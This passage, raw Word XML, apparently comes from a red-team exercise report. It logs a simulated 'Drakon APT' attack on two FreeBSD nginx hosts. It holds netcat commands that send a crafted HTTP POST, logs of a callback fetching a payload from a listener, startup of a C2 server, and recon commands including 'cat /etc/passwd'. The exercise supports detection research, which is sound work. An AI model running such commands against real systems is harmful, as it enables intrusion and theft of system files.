        <w:t xml:space="preserve">Note: We discovered later that we used a Drakon APT with the wrong address, 128.55.12.167:8888.  This explains why the initial tests appeared to fail.  They actually did and connected out to the wrong listener that we weren’t watching for C2.  Those are included below as well. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1271140E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D6CE927" w14:textId="542E61F7" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The CADETS hosts were both attacked in succession using the Nginx Drakon APT simulacrum.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4842D5DB" w14:textId="13DF3F1E" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>For the attack against CADETS the exploits Nginx by simulation of remote code execution on the listening port of the webserver TCP 80.  A malicious HTTP post is sent to 128.55.12.75:80 and 128.55.12.51:80 respectively.   The callback is established to C2 and the following commands are sent to gather intel on the host environment: hostname, whoami, cat /etc/</w:t>
      </w:r>
      <w:r w:rsidR="00650FDF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd, whoami, and hostname.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47131277" w14:textId="56C37F30" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="206" w:name="_dunnm2fwlnk" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="207" w:name="_Toc12600116"/>
      <w:bookmarkEnd w:id="206"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207"/>
    </w:p>
    <w:p w14:paraId="41B84C40" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-cadets-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.51</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FreeBSD 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5652181A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-cadets-2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.75</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FreeBSD 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26738A05" w14:textId="1D57C23C" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="208" w:name="_y6nul2j6e5xe" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="209" w:name="_Toc12600117"/>
      <w:bookmarkEnd w:id="208"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209"/>
    </w:p>
    <w:p w14:paraId="39829CDC"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Nginx 1.14.2 Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C882DB" w14:textId="617BAD75" w:rsidR="00A351B2"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Drakon APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0DF10A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="210" w:name="_Toc12600118"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210"/>
    </w:p>
    <w:p w14:paraId="67E4D1F0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="211" w:name="_uu3yinfbqo5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="211"/>
      <w:r>
        <w:t>ta1-cadets-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5056E510" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309E80D6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@kududyn-ProLiant-SL170s-G6:/e5/stage1_cadets/http_post# cat http_post_ca51 | nc 128.55.12.51 80                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC16C68" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP/1.1 403 Forbidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5668A361" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Server: nginx/1.14.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075092AA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Date: Fri, 17 May 2019 14:17:11 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39172FBE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Content-Type: text/html; charset=UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498F5767" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Transfer-Encoding: chunked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B18D9EB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236CDB7F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>X-Powered-By: PHP/7.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222D69C9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="434004E8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A091DAA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Access denied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC3AD05" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FD15D60" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF80D6E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="302821D5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>listening at address unknown on port 8117</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA6BF60" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>GET request for /index.html?q=FX64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0874EE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.167 - - [17/May/2019 10:17:14] "GET /index.html?q=FX64 HTTP/1.0" 200 -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157AAB00" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>OS:F ARCH:X64 looking up "FX64" in payloads..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFEDEFE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>finalizing headers, specifically Content-Length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BD6E65" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>writing 0x27FC0 (163776) bytes of payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F40F467" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59ECF9D8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7339B8EB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@kududyn-ProLiant-SL170s-G6:/e5/stage1_cadets/http_post# cat http_post_ca51 | nc 128.55.12.51 80 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08780D54" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP/1.1 403 Forbidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A41008" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Server: nginx/1.14.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3107C572" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Date: Fri, 17 May 2019 14:18:59 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122E6548" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Content-Type: text/html; charset=UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F04959" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Transfer-Encoding: chunked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553A906B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C33A17" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>X-Powered-By: PHP/7.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56986503" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F680A12" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4557102F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Access denied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3814A507" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B0BE21A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EDA9C7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7597292E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>GET request for /index.html?q=FX64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4313CD83" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.167 - - [17/May/2019 10:19:02] "GET /index.html?q=FX64 HTTP/1.0" 200 -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BFE18B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>OS:F ARCH:X64 looking up "FX64" in payloads..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013C923A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>finalizing headers, specifically Content-Length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC270CC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>writing 0x27FC0 (163776) bytes of payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6DFEA7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCF2904" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@ta51-pivot-2:~/oc2_cadets# python ocMain.py --http 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0965669B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Must install flask to use snuggly, ignoring...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121E0E38" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>projects/build_drakon.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26143FE1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Default interface: 0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E363CA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Listening for connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B784068" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            0.0.0.0:80    [HTTP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4BB1B9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="212" w:name="_rv378nk43sst" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="212"/>
      <w:r>
        <w:t>ta1-cadets-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EDB4CF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3E68A6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@kududyn-ProLiant-SL170s-G6:/e5/stage1_cadets/http_post# cat http_post_ca75 | nc 128.55.12.75 80 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5441A762" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP/1.1 403 Forbidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BF36D6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Server: nginx/1.14.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A7A096" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Date: Fri, 17 May 2019 14:25:19 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C86340" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Content-Type: text/html; charset=UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72945009" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Transfer-Encoding: chunked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECF558B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33117B1B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>X-Powered-By: PHP/7.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AC8AD5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3656E6EB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE5A189" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Access denied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A72C849" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707A3EE1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCB3DF1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C14184C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>listening at address unknown on port 8117</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F4FBF7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>GET request for /index.html?q=FX64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76732332" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.167 - - [17/May/2019 10:25:22] "GET /index.html?q=FX64 HTTP/1.0" 200 -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1A27A8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>OS:F ARCH:X64 looking up "FX64" in payloads..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1870207D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>finalizing headers, specifically Content-Length</w:t>
      </w:r>
    </w:p>
